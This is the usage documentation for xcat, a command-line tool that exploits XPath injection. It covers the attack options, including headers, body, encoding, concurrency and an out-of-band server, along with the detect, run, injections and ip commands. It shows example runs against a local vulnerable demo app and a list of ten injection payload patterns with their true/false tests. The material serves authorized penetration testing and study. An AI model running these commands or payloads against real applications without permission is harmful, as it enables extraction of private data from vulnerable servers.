Common options
All commands except ip
take the same arguments. These describe the attack you are making,
and allows xcat to explore it and work out what features it can use.
At minimum you need to supply:
- A URL to attack (
url
) - A target parameter which is vulnerable to XPath injection (
target_parameter
) - A value for this parameter, and optionally others if required (
parameters
) - A string or a status code that is present in the response if the condition is True (
--true-string
and--true-code
)
To attack the example vulnerable application you would use:
xcat run http://localhost:4567/ query query=Rogue --true-string=Lawyer
This instructs xcat
that:
- The vulnerable URL is
http://localhost:4567/
- The vulnerable parameter is
query
- The parameters to pass to the URL are
query=Rogue
- The true condition is
Lawyer
being present in the response
Additional options
--headers
This argument can be used to send custom headers, including cookies. It should be a file path to a plain text file containing lines in the following format:
Header-Name: header-value
Example: xcat run ... --headers=my-header-file.txt
--body
This argument is a path to a file containing a request body to send. This is helpful if you are exploiting a POST request that has a vulnerable URL parameter, but also require a POST body to be sent. The file contents are sent as-is.
Example: xcat run ... --headers=my-request-body.txt
--encode
xcat currently supports manipulating either URL or form parameters. This allows you to switch between sending the exploit payload via the POST body or URL arguments.
Example: xcat run ... --encode=form
--fast
When this flag is present then xcat will only retrieve the first 15 characters of strings. This can drastically speed up retrieval in documents that contain very large strings.
Example: xcat run ... --fast
--concurrency
This parameter limits the number of concurrent connections xcat can make. Setting it too low will slow down exploitation, but can reduce the load on the target server.
Example: xcat run ... --concurrency=10
--enable/--disable
xcat attempts to intelligently detect what features the target server supports and uses these to speed up retrieval. These flags let you force enable or disable these features.
Example: xcat run ... --enable=substring-search
--oob
Enables the oob
server. For more info see the oob server documentation.
Example: xcat run ... --oob=$EXTERNAL_IP:$EXTERNAL_PORT
detect
This command will print out what injection xcat has detected, as well as a list of features and their status. You can use this to quickly explore an injection and different parameter values before commencing an attack.
$ xcat detect http://localhost:4567/ query query=Rogue --true-string=Lawyer
function call - last string parameter - single quote
Example: /lib/something[function(?)]
Detected features:
xpath-2: True
xpath-3: False
xpath-3.1: False
normalize-space: True
substring-search: True
codepoint-search: True
environment-variables: False
document-uri: True
base-uri: True
current-datetime: True
unparsed-text: False
doc-function: True
linux: False
expath-file: False
saxon: False
oob-http: False
oob-entity-injection: False
run
This is the core function of xcat. It will retrieve the whole document that is being queried with the vulnerable xpath expression.
$ xcat run http://localhost:4567/ query query=Rogue --true-string=Lawyer
<root first="1" second="2" third="">
<!--My lovely library-->
<books>
<book>
<title>
Rogue Lawyer
</title>
<author>
John Grisham
</author>
...
shell
This is one of the most powerful features of xcat.
Please see the dedicated shell
documentation here
injections
This command prints out all the injections xcat currently can use, along with the sample expressions xcat will use to test if this injection works.
$ xcat injections
Supports 10 injections:
Name: integer
Example: /lib/book[id=?]
Tests:
? and 1=1 = passes
? and 1=2 = fails
Name: string - single quote
Example: /lib/book[name='?']
Tests:
?' and '1'='1 = passes
?' and '1'='2 = fails
Name: string - double quote
Example: /lib/book[name="?"]
Tests:
?" and "1"="1 = passes
?" and "1"="2 = fails
Name: attribute name - prefix
Example: /lib/book[?=value]
Tests:
1=1 and ? = passes
1=2 and ? = fails
Name: attribute name - postfix
Example: /lib/book[?=value]
Tests:
? and not 1=2 and ? = passes
? and 1=2 and ? = fails
Name: element name - prefix
Example: /lib/something?/
Tests:
.[true()]/? = passes
.[false()]/? = fails
Name: element name - postfix
Example: /lib/?something
Tests:
?[true()] = passes
?[false()] = fails
Name: function call - last string parameter - single quote
Example: /lib/something[function(?)]
Tests:
?') and true() and string('1'='1 = passes
?') and false() and string('1'='1 = fails
Name: function call - last string parameter - double quote
Example: /lib/something[function(?)]
Tests:
?") and true() and string("1"="1 = passes
?") and false() and string("1"="1 = fails
Name: other elements - last string parameter - double quote
Example: /lib/something[function(?) and false()] | //*[?]
Tests:
?") and false()] | //*[true() and string("1"="1 = passes
?") and false()] | //*[false() and string("1"="1 = fails
ip
This command is a convenience function to get your current external IP address. It takes no arguments.
$ xcat ip
123.210.60.90